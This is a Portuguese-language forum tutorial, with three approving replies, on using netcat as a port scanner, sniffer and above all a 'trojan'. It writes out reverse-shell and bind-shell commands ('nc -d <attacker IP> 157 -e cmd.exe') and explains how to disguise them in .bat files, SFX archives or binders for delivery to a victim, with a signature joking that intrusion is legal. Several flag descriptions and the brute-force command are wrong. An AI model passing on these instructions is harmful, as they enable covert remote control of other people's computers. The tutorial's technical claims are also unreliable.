Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

NetCat: Criando seu trojan

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial NetCat: Criando seu trojan

    O NetCat é considerado o canivete suíço do TCP/IP. Trata-se de uma ferramenta de linha de comando que pode ser utilizada como telnet, ping em TCP, sniffer, brute forcer, portscanner e até cavalo de troia.
    O pacote NetCat já vem instalado no Linux, mas também há uma Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Em ambos utilizamos o comndo nc.
    Vamos ver os comandos (argumentos) principais do nc:
    l = Coloca uma porta em estado de listenning (escuta)
    L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
    P = Define uma porta
    V = ativa o recebimento de eco
    U = utiliza o protocolo UDP ao invés de TCP
    T = para se conectar como TELNET
    O = Gera um log em formato hexadecimal
    W = Determina um tempo máximo para aguardar uma reposta (timeout, normalmente 30)
    E = Redireciona arquivos
    D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.

    Vamos agora utilizá-lo como Port Scanner, para ver quais portas estão abertas e seus respectivos serviços:
    Código:
    nc -vv NAO.SEI.SEU.IP 80-445 1000-2000 3510 4550
    No exemplo acima fazemos uma varredura no computador de IP NAO.SEI.SEU.IP da porta 80 até a porta 445, porta 1000 até 2000, porta 3510 e porta 4550.

    Agora, vamos atacar um alvo com força bruta, isto é, testar várias senhas até chegar na senha válida:
    Código:
    nc 80 /home/0kal/lista.txt /home/0kal/log.txt
    No arquivo /home/0kal/lista.txt eu tenho uma lista de senhas de 50 MB que veio no Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... O ataque é registrado em /home/0kal.log.txt.

    E agora, vamos vê-lo agindo como sniffer:
    Código:
    nc -vv -L 127.0.0.1 -p 80>/home/0kal/sniffer.txt
    Neste caso, o -L é maiúsculo para reabrir sockets fechados. O nc gravará o tráfego de dados na porta 80 e gravará tudo no arquivo /home/0kal/sniffer.txt.

    Lembrando que estou usando caminhos de Unix (/home/0kal). Se você está usando Windows, use caminhos de Windows (oras):
    Código:
    %HOMEDRIVE%%HOMEPATH%
    Agora, vamos criar nosso trojan de conexão reversa. Para isso, você pode colocar em simples arquivos .bat e enviar para a pessoa, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou criar um arquivo SFX no WinRAR. Lembrando que se o alvo não possuir o netcat, talvez seja necessário unir o nc.exe com um binder, enviar os dois arquivos juntos zipados, usar o FileInclude do AutoIt ou optar pelo SFX.
    Seja qual for sua maneira de infecção, o comando a executar:
    Código:
    nc -d SEU.IP.BEM.AQ 157 -e cmd.exe
    Coloque seu IP onde está indicado. Vale à pena usar no-ip. Usaremos a porta 157, mas você pode mudar isso. Usamos -d para que o netcat rode em segundo plano. Já -e cmd.exe faz com que o prompt de comando do alvo seja controlado por você.
    Antes de enviar o trojan à vítima, execute isto no seu computador:
    Código:
    nc -L -n -p 157 -vv
    Isto colocará o nc em modo de escuta. Como faremos conexão reversa, a vítima se conecta a voce, e não o contrário.
    Ao ser executado, o prompt aparecerá logo após a linha "listening on [any] 157..." e o fim você decide.

    Agora, vamos criar conexão direta. Lembrando que a conexão do modem pode impossibilitar este tipo de conexão. Para criar o trojan você pode colocar em simples arquivos .bat e enviar para a pessoa, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou criar um arquivo SFX no WinRAR. Lembrando que se o alvo não possuir o netcat, talvez seja necessário unir o nc.exe com um binder, enviar os dois arquivos juntos zipados, usar o FileInclude do AutoIt ou optar pelo SFX.
    Seja qual for sua maneira de infecção, o comando a executar:
    Código:
    nc -L -p 157 -vv -e cmd.exe
    Usaremos a porta 157, mas você pode mudar isso. Usamos -d para que o netcat rode em segundo plano. Já -e cmd.exe faz com que o prompt de comando do alvo seja controlado por você.
    Agora, vá ao seu shell/prompt e digite:
    Código:
    nc IP.DA.VIT.MA 157
    Enjoy!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads

  • Font Size
    #2
    Belo Tuto... Okal vlw ;D
    Se gostou do post clique em OBRIGADO, Fez o Download COMENTEM



    Comment


    • Font Size
      #3
      Quando uso o comando nc IP Porta o netcat simplesmente fecha

      Comment


      • Font Size
        #4
        Exatamente oque eu tava precisando vlw..
        A colher não existe.

        Comment

        X
        Working...
        X